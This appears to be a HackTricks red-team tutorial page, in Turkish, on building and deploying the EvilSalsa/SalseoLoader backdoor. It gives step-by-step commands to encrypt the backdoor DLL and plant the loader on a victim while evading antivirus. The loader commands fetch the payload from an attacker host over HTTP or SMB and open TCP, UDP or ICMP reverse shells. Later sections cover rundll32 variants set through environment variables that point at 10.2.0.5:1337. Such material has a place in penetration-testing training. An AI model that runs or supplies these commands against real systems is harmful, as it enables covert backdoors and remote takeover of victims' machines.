7.7 KiB
Salseo
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live bizi takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Binaries'leri Derleme
Github'dan kaynak kodunu indirin ve EvilSalsa ve SalseoLoader'ı derleyin. Kodu derlemek için Visual Studio'nun yüklü olması gerekmektedir.
Bu projeleri, kullanacağınız Windows kutusunun mimarisi için derleyin (Eğer Windows x64 destekliyorsa, bu mimariler için derleyin).
Visual Studio'da sol "Build" Sekmesi içindeki "Platform Target" kısmından mimariyi seçebilirsiniz.
(**Bu seçenekleri bulamazsanız "Project Tab"'ına tıklayın ve ardından "<Project Name> Properties"'e tıklayın)
Sonra, her iki projeyi de derleyin (Build -> Build Solution) (Kayıtlarda çalıştırılabilir dosyanın yolu görünecektir):
Arka Kapıyı Hazırlama
Öncelikle, EvilSalsa.dll'yi kodlamanız gerekecek. Bunu yapmak için, encrypterassembly.py python script'ini kullanabilir veya EncrypterAssembly projesini derleyebilirsiniz:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Tamam, şimdi Salseo işlemlerini gerçekleştirmek için ihtiyacınız olan her şeye sahipsiniz: encoded EvilDalsa.dll ve SalseoLoader'ın binary'si.
SalseoLoader.exe binary'sini makineye yükleyin. Hiçbir antivirüs tarafından tespit edilmemelidir...
Arka kapıyı çalıştırma
TCP ters shell almak (HTTP üzerinden encoded dll indirme)
nc'yi ters shell dinleyicisi olarak başlatmayı ve encoded evilsalsa'yı sunmak için bir HTTP sunucusu kurmayı unutmayın.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
UDP ters shell almak (SMB üzerinden kodlanmış dll indirme)
nc'yi ters shell dinleyicisi olarak başlatmayı ve kodlanmış evilsalsa'yı sunmak için bir SMB sunucusu kurmayı unutmayın.
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
ICMP ters shell almak (şifrelenmiş dll zaten kurbanın içinde)
Bu sefer ters shell almak için istemcide özel bir araca ihtiyacınız var. İndirin: https://github.com/inquisb/icmpsh
ICMP Yanıtlarını Devre Dışı Bırak:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Müşteriyi çalıştır:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Kurbanın içinde, salseo şeyini çalıştıralım:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
SalseoLoader'ı ana fonksiyonu dışa aktaran DLL olarak derleme
SalseoLoader projesini Visual Studio ile açın.
Ana fonksiyondan önce ekleyin: [DllExport]
Bu proje için DllExport'ı yükleyin
Araçlar --> NuGet Paket Yöneticisi --> Çözüm için NuGet Paketlerini Yönet...
DllExport paketini arayın (Gözat sekmesini kullanarak) ve Yükle'ye basın (ve açılan pencereyi kabul edin)
Proje klasörünüzde DllExport.bat ve DllExport_Configure.bat dosyaları belirdi.
Uninstall DllExport
Kaldır'a basın (evet, garip ama bana güvenin, bu gerekli)
Visual Studio'dan çıkın ve DllExport_configure'ı çalıştırın
Sadece çıkın Visual Studio'dan
Sonra, SalseoLoader klasörünüze gidin ve DllExport_Configure.bat'ı çalıştırın.
x64'ü seçin (eğer x64 bir kutu içinde kullanacaksanız, benim durumum buydu), System.Runtime.InteropServices'i seçin ( DllExport için Ad Alanı içinde) ve Uygula'ya basın.
Projeyi tekrar Visual Studio ile açın
[DllExport] artık hata olarak işaretlenmemelidir.
Çözümü derleyin
Çıktı Türü = Sınıf Kütüphanesi'ni seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çıktı türü = Sınıf Kütüphanesi)
x64 platformunu seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)
Çözümü derlemek için: Derle --> Çözümü Derle (Çıktı konsolunun içinde yeni DLL'in yolu görünecektir)
Oluşturulan Dll'i test edin
Dll'i test etmek istediğiniz yere kopyalayın ve yapıştırın.
Çalıştırın:
rundll32.exe SalseoLoader.dll,main
Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!
DLL kullanarak bir shell alın
Bir HTTP sunucusu kullanmayı ve bir nc dinleyicisi ayarlamayı unutmayın.
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.